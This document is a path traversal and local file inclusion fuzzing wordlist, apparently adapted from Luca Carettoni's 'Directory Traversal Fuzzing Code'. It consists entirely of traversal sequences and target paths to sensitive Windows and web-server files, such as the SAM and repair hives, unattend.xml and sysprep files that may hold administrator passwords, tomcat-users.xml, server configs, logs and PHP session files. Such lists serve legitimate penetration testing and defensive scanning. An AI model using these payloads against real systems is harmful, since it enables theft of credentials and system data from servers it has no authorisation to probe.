C:/windows/panther/unattend.xml

C:/winnt/win.ini
\xampp\tomcat\conf\web.xml
C:/$recycle.bin/s-1-5-18/desktop.ini
C:/sysprep/sysprep.xml
C:/windows/panther/unattend/sysprep.inf
/..........................................................................\
C:/log/access.log
/....\....\....\....\....\....\....\....\
Statement
/NetServer\bin\stable\apache\php.ini
.pass
C:/system volume information/wpsettings.dat
C:/programfiles/xampp/apache/conf/httpd.conf
C:/users/administrator/ntuser.ini
C:\log\error.log
C:/windows/notepad.exe
C:\xampp\webdav\webdav.txt
C:\apache2\log\access.log
C:\WINDOWS\Repair\SAM
/....\
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
C:\xampp\tomcat\conf\web.xml
C:\WINNT\php.ini
C:\xampp\apache\conf\httpd.conf
C:\ProgramFiles\xampp\apache\conf\httpd.conf
\log\error.log
C:\apache2\log\error.log
C:/apache2/log/error.log
/.shosts
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
C:/system32/inetsrv/metabase.xml
/....\....\
C:/unattended.xml
C:/windows/panther/unattend.txt
C:\WINNT\php.ini
wp-admin.php
C:/windows/csc/v2.0.6/sm
\log\access.log
\apache2\log\access.log
C:/windows/panther/unattended.txt
d:\System32\Inetsrv\metabase.xml
# Directory Traversal Fuzzing Code
C:/windows/panther/unattend/setupinfo.bak
C:\WINNT\win.ini
C:/windows/iis6.log (5,6 or 7)
C:/xampp/apache/conf/httpd.conf
/.\/\.\
C:/windows/iis8.log
/....\....\....\....\....\....\....\
C:/apache2/log/access.log
C:/windows/panther/sysprep.inf
C:\log\access_log
C:\nginx-1.7.4\conf\nginx.conf
c:\WINNT\php.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
C:/windows/system.ini
\log\error_log
C:/xampp/webdav/webdav.txt
/NetServer\bin\stable\apache\php.ini
C:/windows/panther/unattended.xml
C:\logs\httpd\error_log
C:/windows/iis6.log
C:\php4\sessions\
C:/windows/panther/unattend/unattend.xml
/usr/local/pureftpd/sbin/pure-config.pl
\logs\httpd\access_log
C:\WINDOWS\win.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
\logs\httpd\error_log
c:\home\bin\stable\apache\php.ini
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
C:/windows/iis7.log
C:/windows/repair/system
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
C:/windows/panther/unattend/unattended.txt
C:\apache2\log\error_log
\log\access_log
C:/windows/panther/unattend/unattend.txt
/....\....\....\....\....\....\
\xampp\webdav\webdav.txt
c:\AppServ\MySQL
/....\....\....\....\....\
/usr/local/pureftpd/sbin/pure-config.pl
C:/documents and settings/administrator/ntuser.ini
C:/windows/win.ini
C:/winnt/php.ini
/....\....\....\....\
c:\System32\Inetsrv\metabase.xml
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
C:\nginx-1.7.4\nginx.conf
/....\....\....\
C:\WINDOWS\win.ini
C:/sysprep.xml
\log\httpd\access_log
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
\log\httpd\error_log
C:/windows/repair/security
\apache2\log\error.log
C:\xampp\tomcat\conf\tomcat-users.xml
C:/windows/panther/sysprep.xml
d:\AppServ\MySQL
\xampp\apache\conf\httpd.conf
C:/sysprep.inf
C:\WINDOWS\win.ini
C:/sysprep/sysprep.inf
C:/windows/panther/unattend/setupinfo
c:\NetServer\bin\stable\apache\php.ini
/var/lib/php5/session/sess_<sessid>
C:/windows/repair/software
\apache2\log\access_log
\xampp\tomcat\conf\tomcat-users.xml
C:/users/administrator/ntuser.dat
c:\home2\bin\stable\apache\php.ini
/NetServer\bin\stable\apache\php.ini
C:/windows/panther/unattend/sysprep.xml
C:\log\access.log